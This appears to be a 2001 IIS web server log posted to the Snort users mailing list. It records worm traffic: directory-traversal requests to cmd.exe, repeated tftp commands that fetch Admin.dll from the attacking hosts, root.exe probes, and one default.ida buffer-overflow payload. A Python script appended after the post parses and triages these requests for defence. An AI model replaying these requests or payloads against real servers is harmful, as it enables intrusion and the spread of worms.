/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:47:18 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:47:18 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:19 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:23 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:23 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:47:24 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:47:27 66.31.25.7 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:27 66.31.25.7 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:47:28 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:47:31 66.31.25.7 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:36 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:36 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:47 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:47 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:47 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:54 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:48:12 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:48:15 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:15 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:49:06 66.31.94.77 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:49:06 66.31.94.77 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:49:34 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:49:53 66.31.23.222 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:49:53 66.31.23.222 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:49:55 66.31.23.222 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:49:55 66.31.23.222 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:49:55 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:49:56 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:49:56 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:50:37 66.12.111.154 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:50:49 66.12.111.154 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:50:52 66.12.111.154 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:50:56 66.12.111.154 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:50:59 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:01 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:03 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:04 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:06 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:07 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:08 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:51:10 66.31.23.222 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:11 66.31.23.222 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:51:12 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:51:12 66.31.23.222 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:13 66.31.23.222 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:13 66.31.23.222 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:14 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:14 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:16 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:16 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:16 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:17 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:17 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:17 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:18 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:18 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:19 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:19 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:21 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:25 66.108.1.109 - 66.31.82.9 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a 302 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:42 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:50 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:50 66.31.42.216 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:51:50 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:51:56 66.31.42.216 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:52:03 66.31.42.216 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:09 66.31.42.216 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:16 66.31.42.216 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:21 66.31.42.216 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.42.216%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:27 66.31.42.216 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.42.216%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:39 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:39 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:52:48 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:52:50 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:52:54 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:52:54 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:55 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:55 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:53:08 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:53:08 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:53:09 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:53:09 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: log.txt
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20010918/b8e18cc7/attachment.txt>
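One way to make a wrapped log like the one in the post readable, shown as an added example that is not part of the original message: rejoin the wrapped lines into one record per request, then group requests by source, by what they attempted, and by whether the status code calls for follow-up. The field order and the triage rule are assumptions of this example; the sample records are copied from the log above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Four records copied from the log above, still in their mail-wrapped layout.
SAMPLE = r"""2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:39 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:54 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
"""

def reassemble(text):
    """Join wrapped lines so that each request is one record again."""
    # A new record starts at every timestamp; the lookahead keeps it in the piece.
    pieces = re.split(r"\n(?=\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} )", text.strip())
    return [" ".join(p.split()) for p in pieces]

def parse(record):
    # Assumed order: date time client user server port method stem query status extra
    f = record.split()
    if len(f) < 11 or not f[-2].isdigit():
        return None  # damaged record: leave for manual review
    return {"client": f[2], "stem": f[7].lower(),
            "query": unquote_plus(" ".join(f[8:-2])).lower(), "status": int(f[-2])}

def classify(r):
    """Triage heuristic (an assumption of this example, not an IIS rule)."""
    if "tftp" in r["query"]:
        kind = "tftp download attempt"
    elif r["stem"].endswith(("cmd.exe", "root.exe")):
        kind = "command-execution probe"
    else:
        kind = "request for Admin.dll" if r["stem"].endswith("admin.dll") else "other"
    # 403/404: refused or not found. 200: served. 5xx: the server handled the
    # request and then failed, which does not prove that nothing ran.
    return kind, "rejected" if r["status"] in (403, 404) else "investigate"

def triage(text):
    parsed = filter(None, map(parse, reassemble(text)))
    return Counter((r["client"],) + classify(r) for r in parsed)

if __name__ == "__main__":
    for (client, kind, outcome), n in sorted(triage(SAMPLE).items()):
        print(f"{client:15} {kind:26} {outcome:12} x{n}")
```

Rows marked "investigate" are the ones to check against the file system and registry on the server; rows marked "rejected" were refused or hit a path that does not exist.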